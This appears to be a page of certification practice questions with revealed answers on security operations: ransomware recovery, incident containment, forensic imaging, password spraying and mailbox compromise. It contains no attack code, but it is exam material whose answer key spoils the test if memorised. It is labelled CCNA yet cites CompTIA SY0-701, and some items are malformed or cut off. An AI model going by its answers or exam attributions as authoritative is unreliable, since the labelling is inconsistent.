CCNA Security Operations Questions

75 of 291 questions · Page 2/4 · Security Operations · Answers revealed

76
Multi-Selecthard

After a ransomware incident, management sees that last night's backups completed successfully and wants proof they can actually be used before production is declared recovered. Which three actions best validate recoverability? Select three.

Select 3 answers
A.Restore a representative backup into an isolated test environment.
B.Run application and data validation checks on the restored system.
C.Measure the restore duration against the documented recovery objectives.
D.Increase the retention period without performing any restore.
E.Close the incident because the backup software reported a successful job completion.
AnswersA, B, C

A real restore test shows whether the backup can be recovered without risking production data.

Why this answer

Option A is correct because restoring a representative backup into an isolated test environment directly validates that the backup data is readable, the restore process works, and the system can be brought online without impacting production. This is the only way to confirm the backup is not corrupt or incomplete, as backup software success logs alone are insufficient.

Exam trap

The trap here is that candidates assume a successful backup job log is sufficient proof of recoverability, but CompTIA emphasizes that only a verified restore in a test environment can confirm the backup is usable, as backup software does not validate the restore process or data integrity.

77
MCQmedium

The SOC has contained a mailbox compromise by resetting the password and revoking active sessions. Investigation shows the attacker created an automatic forwarding rule and added an OAuth consent grant. What should happen next to eradicate the threat?

A.Notify all employees to be more careful with email before taking any technical steps.
B.Delete the mailbox and create a new account for the user immediately.
C.Remove the malicious forwarding rule and review or revoke suspicious OAuth app grants.
D.Restore the user's messages from backup and reopen access without further review.
AnswerC

Eradication means removing the adversary's persistence mechanisms and closing the foothold they created. In a mailbox compromise, forwarding rules and unauthorized OAuth consents are common persistence methods. Removing those artifacts, then confirming no other malicious rules or delegated access remain, is the correct next step before returning the account to normal use and monitoring for recurrence.

Why this answer

Option C is correct because the immediate next step after containment is to remove the attacker's persistence mechanisms. The malicious forwarding rule (which exfiltrates emails via SMTP) and the OAuth consent grant (which provides persistent API access) must be removed to fully eradicate the threat. Simply resetting the password and revoking sessions does not remove these backdoors, as OAuth grants persist independently of user credentials.

Exam trap

The trap here is that candidates assume a password reset and session revocation fully remediate the compromise, overlooking the fact that OAuth consent grants and mailbox forwarding rules are independent persistence mechanisms that must be explicitly removed.

How to eliminate wrong answers

Option A is wrong because notifying employees to be more careful is a general awareness step, not a technical eradication action, and it delays removing the attacker's active persistence mechanisms. Option B is wrong because deleting the mailbox and creating a new account is an overly destructive step that destroys forensic evidence and disrupts business operations; the correct approach is to surgically remove the malicious rules and grants while preserving the mailbox for investigation. Option D is wrong because restoring from backup and reopening access without reviewing or removing the forwarding rule and OAuth grant would re-introduce the same persistence mechanisms, leaving the compromise active.

78
MCQmedium

Based on the exhibit, which change best helps the company meet its recovery objectives after a ransomware event?

A.Increase the retention period on the existing NAS backups to one year.
B.Move backups to an immutable, offline or logically isolated repository and test restores regularly.
C.Store the backup administrator password in a shared team spreadsheet so more staff can restore data quickly.
D.Replace the nightly full backup with a longer full backup window to capture more data each day.
AnswerB

An isolated, immutable backup target reduces the chance that ransomware can encrypt or delete backups. Regular restore testing confirms that the company can actually recover within the stated RTO and RPO. Because the current repository is domain-joined and reachable over SMB, it is too exposed. Isolation and tested recovery provide the strongest practical resilience improvement.

Why this answer

Option B is correct because ransomware often encrypts or deletes accessible backups. An immutable, offline, or logically isolated repository prevents attackers from modifying or deleting backup data, ensuring a clean recovery point. Regularly testing restores validates that the backups are functional and meet recovery objectives (RTO/RPO).

This aligns with the 3-2-1 backup rule and NIST SP 800-184 guidance for ransomware recovery.

Exam trap

The trap here is that candidates often assume longer retention or more frequent backups alone improve recovery, but they overlook the need for isolation and immutability to protect against ransomware's ability to target accessible backup data.

How to eliminate wrong answers

Option A is wrong because increasing the retention period on existing NAS backups does not protect them from being encrypted or deleted by ransomware if the NAS is network-accessible; retention alone does not provide immutability or isolation. Option C is wrong because storing the backup administrator password in a shared team spreadsheet violates the principle of least privilege and introduces a security risk; it does not improve recovery speed or integrity and could lead to unauthorized access or credential theft. Option D is wrong because replacing the nightly full backup with a longer full backup window does not inherently improve recovery objectives; it may increase the backup window and data captured but does not address ransomware resilience, and longer backups can increase exposure to corruption or encryption during the backup window.

79
MCQhard

Based on the exhibit, what is the most likely conclusion after correlating the logs? A configuration-management task ran from a jump host and generated repeated login alerts on target servers. The SOC wants to determine whether this is malicious activity or approved automation.

A.This is a true brute-force attack because any failed login must be malicious.
B.This is a likely false positive caused by approved automation, so the alert should be correlated with the change window.
C.This indicates DNS poisoning because both servers were contacted from the same source IP.
D.This is proof of ransomware spreading laterally over SMB.
AnswerB

The alert lines up with an approved maintenance window, a known jump host, and a documented configuration-management account that should only be used by automation. The mixed failed-and-successful logins are consistent with scripts negotiating authentication rather than an intruder guessing passwords. The SOC should confirm the change record, document the benign cause, and adjust correlation rules if this pattern recurs.

Why this answer

Option B is correct because the logs show repeated login attempts from a jump host, which is a common pattern for configuration-management tools (e.g., Ansible, Puppet) that execute tasks across multiple servers. The SOC should correlate these events with the approved change window to confirm they are part of legitimate automation, not malicious activity. Failed logins alone do not indicate a brute-force attack, as automation scripts may retry connections or use cached credentials that occasionally fail due to network latency or credential rotation.

Exam trap

The trap here is that candidates assume any failed login attempt is malicious, but the SY0-701 exam tests the ability to correlate logs with operational context (e.g., change windows, known source IPs) to identify false positives from legitimate automation.

How to eliminate wrong answers

Option A is wrong because it assumes any failed login is malicious, ignoring that automation tools often generate failed login events due to transient issues (e.g., credential caching, network timeouts) and that a true brute-force attack would show a high volume of rapid, sequential attempts from an external or unexpected source IP. Option C is wrong because DNS poisoning involves manipulating DNS responses to redirect traffic to malicious IPs, which is unrelated to repeated login alerts from a jump host; the same source IP contacting multiple servers is normal for centralized management. Option D is wrong because ransomware spreading laterally over SMB would show evidence of file writes, encryption activity, or SMB session enumeration (e.g., using tools like PsExec or EternalBlue), not simply repeated login alerts from a jump host.

80
MCQhard

A security analyst is reviewing firewall logs and notices repeated connection attempts from a single external IP address to multiple internal IP addresses on TCP port 22 (SSH). Each attempt uses a different username but the same password: 'Spring2024!'. The attempts occur sporadically over a 12-hour period. Which type of attack is most likely being observed?

A.Brute-force attack
B.Dictionary attack
C.Password spraying attack
D.Man-in-the-middle attack
AnswerC

Correct. Password spraying involves an attacker trying a small number of commonly used passwords against many different accounts to avoid lockout and evade detection. The use of a single password against many usernames exactly matches this technique.

Why this answer

This is a password spraying attack because the attacker uses a single common password ('Spring2024!') against multiple usernames across different internal IP addresses, attempting to avoid account lockout by spreading attempts over time and targets. Unlike brute-force or dictionary attacks that focus many passwords against a single account, password spraying targets many accounts with a few weak passwords, making it harder to detect via failed login thresholds.

Exam trap

The trap here is that candidates confuse 'multiple passwords against one user' (brute-force/dictionary) with 'one password against multiple users' (password spraying), especially when the scenario mentions 'different username' and 'same password' — a classic sign of a spraying attack.

How to eliminate wrong answers

Option A is wrong because a brute-force attack tries many passwords against a single username, not a single password against many usernames. Option B is wrong because a dictionary attack uses a list of possible passwords against one account, not a single password across multiple accounts. Option D is wrong because a man-in-the-middle attack intercepts or relays communications between two parties, which is not indicated by repeated SSH connection attempts from an external IP.

81
MCQhard

Based on the exhibit, what is the best immediate action for the SOC or IR team? A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.

A.Isolate the host from the network and revoke its remote access to stop further spread.
B.Restore the workstation from backup immediately before preserving any evidence.
C.Run a vulnerability scan against the subnet to see whether the malware exploited an unpatched service.
D.Notify users to ignore the issue until the next maintenance window because the incident is likely self-limiting.
AnswerA

The workstation shows active compromise with file encryption behavior and outbound lateral movement. Immediate containment should stop additional SMB propagation and protect neighboring systems before deeper analysis begins.

Why this answer

The exhibit shows a macro-launched script, file renaming, and lateral SMB traffic to two other hosts, indicating active lateral movement. Isolating the host (e.g., via network access control or disabling the switch port) immediately stops the spread of the malware to other systems, preserving the ability to investigate without further compromise. This aligns with the first step in incident response: containment before eradication or recovery.

Exam trap

The trap here is that candidates may choose Option C (vulnerability scan) because they think identifying the root cause is the priority, but in an active incident with lateral movement, containment (isolation) must come first per the NIST SP 800-61 incident response framework.

How to eliminate wrong answers

Option B is wrong because restoring from backup before preserving evidence destroys volatile data and artifacts (e.g., memory, logs, renamed files) that are critical for forensic analysis and understanding the attack vector. Option C is wrong because running a vulnerability scan is a slow, passive step that does not address the immediate active threat of lateral movement; it also risks alerting the attacker or consuming network resources during an active incident. Option D is wrong because the incident is not self-limiting—macro-launched scripts and SMB lateral movement indicate an active, potentially spreading threat that requires immediate action, not deferral to a maintenance window.

82
MCQmedium

A SOC analyst is reviewing logs from a Windows domain controller and notices a large number of failed logon attempts (Event ID 4625) from a single source IP address within a five-minute window. The account names used are random strings such as "a1b2c3", "x9y8z7", etc. The analyst then checks the source IP and finds it is a known external address from a foreign country. Which of the following is the most appropriate next step for the analyst to take?

A.Immediately block the IP address at the perimeter firewall.
B.Investigate whether any of the attempted accounts correspond to actual domain users.
C.Run a full antivirus scan on the domain controller.
D.Notify the company's legal department for law enforcement involvement.
AnswerB

This is the correct first step. If any of the random account names match legitimate domain accounts, it indicates a targeted attack and possible credential compromise. Even if no failures are logged, a successful authentication might have been recorded separately. This investigation guides subsequent containment and remediation.

Why this answer

Option B is correct because the analyst must first determine if any of the randomly generated account names match existing domain user accounts. If a match is found, it indicates a targeted password-spraying or brute-force attack against valid accounts, requiring immediate account lockdown and credential reset. This investigation step aligns with the incident response process of identification before containment or escalation.

Exam trap

The trap here is that candidates may jump to immediate blocking (Option A) as a reflexive security action, but the SY0-701 emphasizes following the incident response process—identify and analyze before containing.

How to eliminate wrong answers

Option A is wrong because immediately blocking the IP at the perimeter firewall without confirming the attack's success or impact may disrupt legitimate traffic and bypasses proper incident response procedures. Option C is wrong because a full antivirus scan on the domain controller addresses malware, not authentication-based attacks like brute-force or password spraying; the logs show failed logon attempts, not signs of infection. Option D is wrong because notifying the legal department for law enforcement involvement is premature before confirming the attack's effectiveness or scope; this step typically occurs after containment and evidence collection.

83
MCQmedium

You are handed a company laptop suspected in an insider theft case. Legal says the evidence may be needed in court. Which action best preserves admissibility?

A.Browse the drive directly on the original laptop to identify the most relevant files.
B.Create a forensic image using a write blocker and record hash values.
C.Email the user asking them to return any copies they may have made.
D.Mount the drive read-write so searching and exporting data will be faster.
AnswerB

A forensic image taken through a write blocker is the best choice because it preserves the original media and reduces the chance of accidental modification. Recording cryptographic hash values before and after acquisition helps prove integrity and supports chain of custody. That combination is standard practice when evidence might be examined in a disciplinary, regulatory, or legal setting.

Why this answer

Option B is correct because creating a forensic image with a write blocker ensures the original evidence remains unaltered, preserving its integrity for court admissibility. Recording hash values (e.g., SHA-256) provides a cryptographic fingerprint that can later verify the image is an exact copy, meeting legal standards for chain of custody and authenticity.

Exam trap

The trap here is that candidates may think direct browsing or read-write mounting is faster and acceptable, but they fail to recognize that any write access—even unintentional—breaks forensic integrity and admissibility in legal proceedings.

How to eliminate wrong answers

Option A is wrong because directly browsing the drive on the original laptop modifies file metadata (e.g., last access time) and risks accidental alteration, which can break the chain of custody and render evidence inadmissible. Option C is wrong because emailing the user does not preserve evidence; it may alert the suspect, leading to data destruction, and provides no forensic integrity or verifiable chain of custody. Option D is wrong because mounting the drive read-write allows write operations that alter the original data, destroying its forensic integrity and making it inadmissible in court.

84
MCQmedium

After seizing a suspect's laptop, a responder creates a bit-for-bit disk image using a write blocker. The legal team wants the next step that most directly supports evidence integrity for later review. What should the responder do?

A.Open the image file and browse folders to confirm the contents look normal.
B.Compute and document cryptographic hash values for the source and the image.
C.Rename the image file with the case number and store it on a desktop.
D.Run a full antivirus scan on the image before logging it in.
AnswerB

Matching hash values provide a verifiable record that the acquired image has not been altered since collection.

Why this answer

Computing and documenting cryptographic hash values (e.g., SHA-256 or MD5) for both the source drive and the bit-for-bit image creates a digital fingerprint. If the hashes match, it proves the image is an exact, unaltered copy of the original evidence, directly supporting integrity for later review. This step is foundational in forensic acquisition to meet legal standards for admissibility.

Exam trap

The trap here is that candidates may think browsing the image is harmless or that antivirus scans are always safe, but the exam tests the strict forensic requirement to never modify original evidence and to use hashing as the sole direct integrity check.

How to eliminate wrong answers

Option A is wrong because opening the image file to browse folders modifies metadata (e.g., last accessed timestamps) and risks altering the evidence, violating forensic best practices. Option C is wrong because renaming the file and storing it on a desktop does not provide any integrity verification; it only aids organization and may expose the image to accidental modification. Option D is wrong because running an antivirus scan on the image can modify the image file (e.g., by quarantining or deleting detected files), breaking the bit-for-bit integrity, and should only be done on a copy, not the original image.

85
Multi-Selecthard

A virtual file server was restored from last night’s backup. The service is online, but some finance users report missing spreadsheet changes and a few files show a 'recovered copy' timestamp. Which two checks should be completed before the team accepts the restore as successful? Select two.

Select 2 answers
A.Compare restored data against backup hashes or a manifest to verify that the copy is complete and uncorrupted.
B.Run an application-level validation test with finance users or sample transactions to confirm the data is usable.
C.Assume the restore is acceptable because the file server is online and users can browse shares.
D.Delete the previous night’s backup so the team will not accidentally restore it again.
E.Expose the restored server directly to the internet so remote users can test it faster.
AnswersA, B

Hash or manifest comparison confirms that the restored files match what was backed up and were not corrupted during storage or recovery. This is a direct integrity check and is more reliable than simply seeing that the server starts. It helps identify silent partial restores.

Why this answer

Option A is correct because comparing restored data against backup hashes or a manifest ensures the data integrity and completeness of the restore process. Even though the file server is online, missing spreadsheet changes and 'recovered copy' timestamps suggest possible corruption or incomplete restoration. Verifying hashes (e.g., SHA-256) against a known-good manifest confirms that every file was restored without bit-rot or truncation, which is a standard post-restore validation step in backup and recovery procedures.

Exam trap

The trap here is that candidates may assume a service being online and shares browsable is sufficient proof of a successful restore, ignoring the need for data integrity verification and application-level validation.

86
MCQmedium

After a new MFA policy rollout, the SIEM generates an alert for five failed logins to a SaaS admin portal from one IP, followed by a successful login to the same account from an IP in another country. The account owner says they were in meetings all day. What should the analyst do first?

A.Disable the account immediately without checking any other logs.
B.Correlate identity provider, VPN, and endpoint logs to validate whether the activity matches the user's normal pattern.
C.Delete the alert because MFA was enabled and the login eventually succeeded.
D.Reimage the user's laptop to remove any possible malware right away.
AnswerB

This is the best first step because triage should validate the alert and establish context before disruptive containment. Correlating identity provider, VPN, and endpoint telemetry can show whether the login came from an expected corporate path, a known remote-access method, or a likely compromise. The analyst can then decide whether account disablement, password resets, or escalation is warranted based on evidence rather than a single suspicious event.

Why this answer

Option B is correct because the alert shows a successful login after five failures from a different country, which is a classic indicator of a potential account takeover. The analyst must correlate identity provider logs (e.g., Okta, Azure AD) for authentication details, VPN logs for network origination, and endpoint logs for device posture to determine if the successful login matches the user's normal behavior. This step validates whether the activity is legitimate or malicious before taking any irreversible action.

Exam trap

The trap here is that candidates assume MFA is infallible and ignore the geographic anomaly, leading them to delete the alert (Option C) or take premature action (Option A or D) without performing proper log correlation.

How to eliminate wrong answers

Option A is wrong because disabling the account immediately without checking other logs could disrupt legitimate access and ignores the possibility of a false positive or a misconfigured MFA policy. Option C is wrong because deleting the alert simply because MFA was enabled and the login succeeded overlooks the fact that MFA can be bypassed (e.g., via session hijacking, token replay, or social engineering), and the geographic anomaly warrants investigation. Option D is wrong because reimaging the laptop is a drastic, premature step that assumes compromise without evidence; the analyst must first confirm whether the successful login originated from the user's device or an attacker's system.

87
MCQmedium

A security analyst is reviewing authentication logs from a corporate web application. The logs show that over a span of two hours, a single external IP address attempted to log in with 500 different usernames, each using the same password 'Spring2024!'. Only a few of these attempts succeeded. Which type of attack is most likely being observed?

A.Brute force attack
B.Password spraying attack
C.Credential stuffing attack
D.Dictionary attack
AnswerB

Correct. Password spraying involves trying a small number of common passwords against many accounts to avoid detection and lockout. The single password used across numerous usernames is the hallmark of this attack.

Why this answer

This is a password spraying attack because the attacker uses a single common password ('Spring2024!') against many different usernames. This technique avoids account lockout policies that typically trigger after multiple failed attempts on a single account, and the few successful logins indicate valid credentials were found.

Exam trap

The trap here is confusing password spraying with brute force: candidates see 'same password' and think brute force, but the key distinction is the attacker targets many usernames with one password, not one username with many passwords.

How to eliminate wrong answers

Option A is wrong because a brute force attack tries many passwords against a single username, not one password against many usernames. Option C is wrong because credential stuffing uses previously leaked username/password pairs from other breaches, not a single password tested across many accounts.

88
MCQmedium

A firewall rule change was implemented directly in production to allow a new vendor IP range. Within minutes, several internal services became unreachable because the rule order changed unexpectedly. Which change-management practice would have most likely prevented this outage?

A.Testing the change in a staging environment and approving it through a peer-reviewed change process before production.
B.Applying the rule during business hours so the team can respond faster if something breaks.
C.Making the change first in production because that is the only environment that matters.
D.Documenting the outage after the vendor confirms their IP range is valid.
AnswerA

A tested, peer-reviewed change process helps catch rule-order problems, dependency issues, and unintended access impacts before production is affected. Firewall changes can alter traffic flow in subtle ways, so validating them in a nonproduction environment and having a formal approval path reduces the chance of service disruption. A backout plan also gives the team a quick recovery path if the production change behaves differently than expected.

Why this answer

Option A is correct because implementing the change in a staging environment first allows validation of the rule order and its impact on traffic flow without affecting production. A peer-reviewed change process ensures that the rule insertion point (e.g., before a deny-all or after a permit statement) is verified, preventing the accidental reordering that caused the outage. This aligns with the change-management principle of testing in a representative environment before production deployment.

Exam trap

The trap here is that candidates may confuse 'change management' with 'incident response' or 'documentation,' leading them to choose options that address symptoms (e.g., faster response or post-hoc documentation) rather than the root cause of unvalidated rule order changes.

How to eliminate wrong answers

Option B is wrong because applying the rule during business hours does not address the root cause—unexpected rule reordering—and may increase risk if the change breaks services during peak usage. Option C is wrong because making the change directly in production bypasses all validation and review, which is precisely the practice that led to the outage. Option D is wrong because documenting the outage after the fact does nothing to prevent it; proactive change management requires testing and approval before implementation.

89
MCQmedium

A branch office's network closet has repeated unauthorized access issues after staff badge in and hold the door for others. Management wants a control that allows one person through after valid badge use and helps prevent tailgating. Which control is best?

A.Closed-circuit television cameras, because they record the doorway for later review.
B.A mantrap, because it physically restricts entry to one person at a time.
C.A motion sensor, because it can detect movement inside the room.
D.A door closer, because it ensures the door automatically shuts after use.
AnswerB

A mantrap creates a controlled entry space that helps block tailgating and enforces single-person access after authentication.

Why this answer

A mantrap is a physical security control consisting of a small space with two interlocking doors, typically requiring authentication to enter and exit. It ensures that only one person can pass through at a time, effectively preventing tailgating by trapping unauthorized individuals between the doors if they attempt to follow an authorized user.

Exam trap

Cisco often tests the distinction between preventive and detective controls, leading candidates to choose CCTV because it is a common security measure, even though it does not actively prevent tailgating.

How to eliminate wrong answers

Option A is wrong because closed-circuit television cameras are a detective control, not a preventive one; they record incidents for later review but do not physically stop tailgating in real time. Option C is wrong because a motion sensor detects movement inside the room but does not control entry or prevent multiple people from passing through a door simultaneously.

90
MCQeasy

An EDR alert shows a user workstation launching an unfamiliar executable from the Downloads folder and then making repeated outbound connections to an IP address in another country. What is the best first response by the security team?

A.Wait for more alerts before taking any action to avoid disrupting the user
B.Isolate the workstation from the network and begin incident triage
C.Immediately reinstall the operating system without collecting evidence
D.Disable the user's account in the directory service and close the ticket
AnswerB

This contains the suspected threat quickly while preserving enough evidence for triage and next steps.

Why this answer

Option B is correct because isolating the workstation from the network immediately stops the potential command-and-control (C2) communication and prevents lateral movement, which is the priority first response in incident triage. The EDR alert indicates a suspicious executable from the Downloads folder making repeated outbound connections to a foreign IP, which strongly suggests malware or a trojan. Isolating the host preserves volatile evidence (e.g., memory, network connections) for forensic analysis while containing the threat.

Exam trap

The trap here is that candidates may confuse incident response phases (e.g., jumping to eradication or recovery before containment) or think that disabling the user account is sufficient, when in fact the running process must be contained first to stop active network communication.

How to eliminate wrong answers

Option A is wrong because waiting for more alerts allows the malware to continue exfiltrating data or spreading to other systems, violating the containment-first principle of incident response. Option C is wrong because immediately reinstalling the OS destroys all volatile evidence (e.g., memory, running processes, network artifacts) needed for root cause analysis and attribution, and may miss persistence mechanisms. Option D is wrong because disabling the user account does not stop the already-running malicious process from making outbound connections or executing further payloads; the host must be contained first.

91
MCQmedium

A finance laptop is powered on, the user is still logged in, and it remains connected to Wi-Fi after a malware alert. What should the responder do first to preserve volatile evidence?

A.Power the laptop off immediately to stop any further attacker activity.
B.Collect volatile data such as memory, running processes, and active network connections.
C.Run a full antimalware scan before touching any other data.
D.Disconnect the power cable and remove the battery to prevent changes.
AnswerB

Volatile evidence is the first thing to lose when a machine shuts down or is rebooted, so collecting it immediately is the best move. Memory, process lists, open sockets, and logged-in sessions can reveal malware injection, command-and-control activity, or stolen credentials in use. Preserving that state before containment actions or shutdown gives investigators a better picture of what happened on the system.

Why this answer

Option B is correct because the laptop is powered on, the user is logged in, and it is connected to the network, meaning volatile data (memory contents, running processes, active network connections) is at immediate risk of being lost if the system is shut down or tampered with. The responder must collect this data first to preserve evidence of the malware's current state, including any malicious processes, network connections, and in-memory artifacts that would disappear on power loss.

Exam trap

The trap here is that candidates mistakenly believe immediate shutdown (Option A) stops attacker activity, but in forensic practice, preserving volatile evidence by capturing memory and network state is always the priority before any power-down action.

How to eliminate wrong answers

Option A is wrong because powering off the laptop immediately destroys all volatile data (RAM, process lists, network connection states) and may trigger anti-forensic mechanisms in malware that wipe traces on shutdown; the correct first step is to capture volatile data before any power state change. Option C is wrong because running a full antimalware scan modifies the system state (reads files, creates logs, may quarantine or delete files) and overwrites or destroys volatile evidence in memory and active connections, violating forensic preservation principles.

92
MCQhard

Based on the exhibit, what is the best eradication decision for the server compromise?

A.Restart sshd and monitor the system for another login attempt.
B.Manually delete the cron entry and reverse the SSH change on the live server.
C.Rebuild the server from a trusted image and restore only known-good data after evidence is preserved.
D.Increase the SIEM retention period and keep the current server online.
AnswerC

The server shows multiple signs of compromise: unauthorized key-based access, script download, cron persistence, and SSH configuration tampering. Those indicators make simple cleanup too risky. A rebuild from a trusted image is the most reliable eradication step, especially once the host is isolated. Evidence should be preserved first, then the service should be restored from validated data and a hardened baseline.

Why this answer

Option C is correct because a server compromise implies that the attacker may have achieved persistence through modified binaries, kernel modules, or rootkits that cannot be reliably removed by simple remediation steps. Rebuilding from a trusted image ensures that all malicious artifacts are eliminated, and restoring only known-good data from backups (after forensic preservation) prevents reintroduction of compromised files. This aligns with the CompTIA incident response process, where eradication must remove all traces of the threat, and rebuilding is the safest approach for a confirmed compromise.

Exam trap

The trap here is that candidates may think manual remediation (Option B) is sufficient because they underestimate the attacker's ability to hide persistence mechanisms, or they confuse containment (e.g., isolating the server) with eradication (completely removing the threat).

How to eliminate wrong answers

Option A is wrong because restarting sshd does not remove the attacker's persistence mechanism (e.g., modified SSH configuration or cron job) and only temporarily disrupts access; the attacker could simply log in again. Option B is wrong because manually deleting a cron entry and reversing an SSH change on a live server is unreliable—the attacker may have installed a rootkit, backdoor, or modified system binaries that cannot be fully reversed, leaving the system still compromised. Option D is wrong because increasing SIEM retention does not address the existing compromise; keeping the compromised server online continues to expose the network to data exfiltration or lateral movement.

93
MCQeasy

A branch office loses power briefly several times each month. Which control best helps keep network equipment running long enough for an orderly shutdown?

A.A UPS
B.A badge reader
C.A locked filing cabinet
D.A fire extinguisher
AnswerA

A UPS provides temporary battery power so systems can stay up briefly or shut down safely.

Why this answer

A UPS (Uninterruptible Power Supply) provides battery backup power to network equipment during a power outage, allowing enough time for an orderly shutdown to prevent data corruption or hardware damage. Unlike surge protectors, a UPS actively supplies clean, regulated power from its batteries when the mains fail, making it the correct control for this scenario.

Exam trap

The trap here is that candidates might confuse a UPS with a surge protector or power strip, thinking any power-related device provides backup runtime, whereas only a UPS contains batteries to sustain power after an outage.

How to eliminate wrong answers

Option B is wrong because a badge reader is an access control mechanism used to restrict physical entry to a facility or room, not a device that provides backup power. Option C is wrong because a locked filing cabinet is a physical security control for protecting sensitive documents, not for maintaining power to network equipment during an outage.

94
MCQmedium

A SOC analyst reviews email platform logs for a finance user account. At 08:12, the user successfully signs in from Denver. At 08:15, the same account signs in from a residential ISP in another state. At 08:16, the mailbox creates a new external forwarding rule and deletes the original alert message. The user says they did not set up forwarding. What is the best assessment?

A.False positive caused by normal mailbox synchronization behavior across devices.
B.True positive indicating likely account compromise and unauthorized mailbox abuse.
C.Benign activity because the user successfully authenticated with valid credentials and no malware was detected.
D.A denial-of-service event because the attacker is attempting to overwhelm the mail system.
AnswerB

The sequence of impossible travel, an unexpected sign-in source, and creation of an external forwarding rule strongly indicates unauthorized access. Deleting the alert email suggests the attacker is trying to hide evidence. The most likely conclusion is that the account is compromised and requires immediate response actions.

Why this answer

The rapid succession of logins from geographically distant locations (Denver and a different state via a residential ISP) within three minutes, followed immediately by creation of an external forwarding rule and deletion of the original alert message, is a classic indicator of account takeover. The user's denial of setting up forwarding confirms the activity is unauthorized. This pattern aligns with attacker behavior: after compromising credentials, they establish persistence (forwarding) and cover tracks (deleting alerts).

Exam trap

The trap here is that candidates mistakenly equate valid authentication with legitimate activity, ignoring the strong circumstantial evidence of impossible travel and unauthorized rule creation that clearly indicates compromise.

How to eliminate wrong answers

Option A is wrong because normal mailbox synchronization across devices would not create an external forwarding rule or delete an alert message; synchronization only replicates existing folder/item changes, not administrative rule creation. Option C is wrong because successful authentication with valid credentials does not rule out compromise—attackers often use stolen or phished credentials, and the subsequent anomalous actions (geographic impossibility, rule creation) override any assumption of benign activity. Option D is wrong because a denial-of-service event would involve overwhelming the mail system with traffic, not a single account's specific configuration changes and message deletion.

95
Multi-Selectmedium

A security analyst is reviewing incident response procedures. Which three of the following activities are typically performed during the 'Containment, Eradication, and Recovery' phase of the incident response process? (Choose three.)

Select 3 answers
.Isolating affected systems from the network to prevent further damage
.Removing malicious files and restoring systems from known good backups
.Rebuilding compromised servers from a secure baseline image
.Conducting a lessons-learned meeting with the incident response team
.Escalating the incident to law enforcement agencies
.Performing forensic imaging of all systems before any action is taken

Why this answer

The 'Containment, Eradication, and Recovery' phase focuses on stopping the spread of an incident, removing the root cause, and restoring normal operations. Isolating affected systems (containment), removing malicious files and restoring from backups (eradication/recovery), and rebuilding from a secure baseline (recovery) are all core activities in this phase, as defined by NIST SP 800-61 Rev. 2 and CompTIA's incident response framework.

Exam trap

The trap here is that candidates confuse the 'Containment, Eradication, and Recovery' phase with the 'Detection and Analysis' phase, mistakenly selecting forensic imaging or escalation as part of containment when they are actually pre-containment steps to preserve evidence and notify stakeholders.

96
MCQmedium

A SOC analyst receives an alert from the EDR system indicating that the process 'C:\Program Files\Vendor\Updater.exe' attempted to modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key on a user's workstation. The analyst checks the file hash and finds it matches a known legitimate software updater. Which of the following actions is most appropriate for the analyst to take?

A.Disable the software updater immediately to prevent further registry modifications.
B.Create an exception rule in the EDR to suppress future alerts for this process.
C.Investigate the user's recent activity and check for signs of process hollowing or DLL injection.
D.Isolate the workstation from the network and reimage the system immediately.
AnswerC

This is the correct next step. The analyst should examine the process's behavior in depth, including checking for anomalies such as unexpected command-line arguments, suspicious parent processes, or indicators of code injection, before concluding whether the alert is a false positive.

Why this answer

Option C is correct because the EDR alert indicates a legitimate process (Updater.exe) modifying a critical persistence registry key (Run). Even with a known good hash, the process could be compromised via process hollowing or DLL injection, where malicious code runs under the guise of a trusted executable. Investigating user activity and checking for these attack techniques is the appropriate next step to confirm whether the behavior is benign or indicative of a threat.

Exam trap

The trap here is that candidates assume a matching file hash guarantees the process is safe, overlooking that attackers can subvert a legitimate process at runtime through memory-based attacks that do not alter the file on disk.

How to eliminate wrong answers

Option A is wrong because disabling the software updater without evidence of malicious activity would disrupt legitimate updates and potentially cause system instability or security gaps. Option B is wrong because creating an exception rule would suppress all future alerts for this process, blinding the SOC to potential compromises that reuse the same executable name or hash. Option D is wrong because isolating and reimaging the workstation is an extreme, resource-intensive response that is not justified when the process hash matches a known legitimate file and there are no confirmed indicators of compromise.

97
MCQeasy

A laptop is suspected of being used in a malware incident. It is still powered on and connected to Wi-Fi. What should the responder do before shutting it down?

A.Install endpoint protection updates on the laptop right away.
B.Capture volatile evidence such as running processes and memory contents.
C.Delete suspicious files so the malware can no longer spread.
D.Reboot the laptop immediately to clear the suspected malware.
AnswerB

This is the best action because volatile data can disappear when the system is powered off or rebooted. Running processes, network connections, logged-on users, and memory contents may contain the strongest clues about active malware and attacker activity. Preserving this information first supports later investigation and helps responders understand what happened before they take more disruptive containment steps.

Why this answer

Option B is correct because volatile evidence, such as running processes, network connections, and memory contents, is lost when the system is powered off. Capturing this data first preserves critical forensic artifacts that can reveal the malware's behavior, persistence mechanisms, and indicators of compromise (IOCs). In a live incident, the responder must follow the order of volatility (RFC 3227) to collect the most ephemeral data before it disappears.

Exam trap

The trap here is that candidates mistakenly think immediate containment (e.g., deleting files or rebooting) is the priority, but the SY0-701 exam emphasizes preserving volatile evidence first to support forensic analysis and legal proceedings.

How to eliminate wrong answers

Option A is wrong because installing endpoint protection updates could alter the system state, overwrite evidence, or trigger anti-forensic behavior by the malware. Option C is wrong because deleting suspicious files destroys evidence and may not stop the malware, which could be running in memory or have persistence mechanisms. Option D is wrong because rebooting clears volatile memory (RAM), losing critical evidence like running processes, network connections, and injected code, and may allow malware to evade detection.

98
MCQmedium

A scan keeps reporting the same medium-severity TLS configuration issue on a public web server. The application owner says the vendor software cannot be changed until next quarter, but they can place the service behind a reverse proxy that enforces stronger cipher settings. How should the issue be handled in the vulnerability management process?

A.Close the finding as fixed because the reverse proxy reduces the risk
B.Record an exception, document the compensating control, and set a review or remediation date
C.Mark the finding as a false positive and remove it from future scans
D.Ignore the finding until the vendor releases a new version
AnswerB

An exception with documented mitigation and follow-up keeps the risk visible and tracked until the underlying issue can be remediated.

Why this answer

Option B is correct because the vulnerability management process requires that when a vulnerability cannot be immediately remediated, compensating controls must be formally documented as an exception with a scheduled remediation date. In this scenario, the reverse proxy enforces stronger cipher settings, effectively mitigating the TLS misconfiguration at the network edge, which is a valid compensating control. Recording the exception ensures auditability and prevents the finding from being prematurely closed while the vendor software remains vulnerable.

Exam trap

The trap here is that candidates assume a compensating control automatically closes the finding, when in fact vulnerability management requires an exception process with documentation and a future remediation date to ensure the root cause is eventually addressed.

How to eliminate wrong answers

